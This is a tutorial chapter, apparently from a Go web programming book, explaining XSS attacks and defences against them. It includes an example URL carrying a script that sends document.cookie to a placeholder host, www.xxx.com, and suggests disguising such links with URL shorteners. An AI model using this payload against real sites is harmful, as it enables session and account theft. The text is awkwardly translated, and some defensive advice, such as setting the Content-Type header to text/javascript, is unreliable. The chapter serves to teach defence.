# 9.3 XSS attacks

With the development of Internet technology, and now the Web application contains a lot of dynamic content to improve the user experience. The so-called dynamic content is that the application environment and the user according to the user request, the output of the corresponding content. Dynamic site will be called "cross-site scripting attacks" (Cross Site Scripting, security experts often be abbreviated as XSS) threats, while static site is completely unaffected by it.

## What is XSS

XSS attacks: cross-site scripting attacks (Cross-Site Scripting), in order not to, and Cascading Style Sheets (Cascading Style Sheets, CSS) acronym confusion, it will be abbreviated as cross-site scripting attacks XSS. XSS is a common web security vulnerability that allows an attacker to provide malicious code into the pages used by other users. Unlike most attacks (generally involve the attacker and the victim), XSS involves three parties, namely the attacker, the client and Web applications. XSS attack goal is to steal a cookie stored on the client or other websites used to identify the identity of sensitive client information. Once you get to the legitimate user's information, the attacker can even impersonate interact with the site.

XSS can usually be divided into two categories: one is the storage type of XSS, mainly in allowing users to input data for use by other users who browse this page to view places, including comments, reviews, blog posts and various forms. Applications to query data from the database, the page is displayed, the attacker entered the relevant page malicious script data, users browse these pages may be attacked. This simple process can be described as: a malicious user input Html Web applications - > access to the database -> Web Programs - > user's browser. The other is reflective XSS, the main approach is to add the script code in the URL address of the request parameters, request parameters into the program directly to the output of the page, the user clicks a malicious link in a similar attack could be.

XSS present the main means and ends as follows:

- Theft of cookie, access to sensitive information.
- The use of implantable Flash, through crossdomain permissions set to further obtain a higher authority, or the use of Java and other get similar operations.
- Use iframe, frame, XMLHttpRequest or the Flash, etc., to (the attacker) the identity of the user to perform some administrative actions, or perform some, such as: micro-Bo, add friends, send private messages and other routine operations, some time ago, Sina microblogging suffered once XSS.
- The use of a domain can be attacked by other characteristics of domain trust to request the identity of trusted sources do not allow some of the usual operations, such as an improper voting.
- In a great number of visits on the page XSS attack some small sites can achieve the effect of DDoS attacks

## XSS principle

Web applications are not submitted the requested data to the user to make a full inspection filter that allows users to incorporate data submitted by HTML code (most notably">","<"), and the output of malicious code without escaping to third parties interpreted the user's browser, is leading causes of XSS vulnerabilities.

Next to reflective XSS XSS illustrate the process: There is now a website, according to the parameters outputs the user 's name, such as accessing url: `http://127.0.0.1/?name=astaxie`, it will output the following in the browser information:

	hello astaxie

If we pass this url: `http://127.0.0.1/?name=<script>alert('astaxie,xss')</script>`, then you will find out a browser pop-up box, which Help the site has been in existence XSS vulnerabilities. So how malicious users steal Cookie it? 
And the like, as this url: 

`http://127.0.0.1/?name=&#60;script&#62;document.location.href='http://www.xxx.com/cookie?'+document.cookie&#60;/script&#62;`
, so that you can put current cookie sent to the specified site: `www.xxx.com`. You might say, so have a look at the URL of the problem, how would someone clicks? Yes, this kind of URL will make people skeptical, but if you use a short URL service to shorten it, you could see it?, The attacker will shorten the url in some way after the spread, know the truth once the user clicks on this url, cookie data will be sent the appropriate pre-configured sites like this on the user's cookie information Theft, then you can use a tool like Websleuth to check whether the user's account to steal.

A more detailed analysis about XSS we can refer to this called" [ Sina microblogging XSS event analysis ] (http://www.rising.com.cn/newsletter/news/2011-08-18/9621.html)" articles

## How to prevent XSS

The answer is simple, and resolutely do not believe any user input, and filter out all the special characters in the input. This will eliminate the majority of XSS attacks.

There are currently XSS defense following ways :

- Filtering special characters

One way to avoid XSS mainly to the user-supplied content filtering, Go language provides the HTML filter function :

`text/template` package below `HTMLEscapeString`, `JSEscapeString` other functions

- Using HTTP headers specified type

`w.Header().Set("Content-Type","text/javascript")`

This allows the browser to parse javascript code, and will not be html output.


## Summary

XSS vulnerability is quite hazardous in the development of Web applications, it is important to remember to filter data, especially in the output to the client, which is now well-established means of preventing XSS.

## Links

- [Directory](preface.md)
- Previous section: [Filter inputs](09.2.md)
- Next section: [SQL injection](09.4.md)
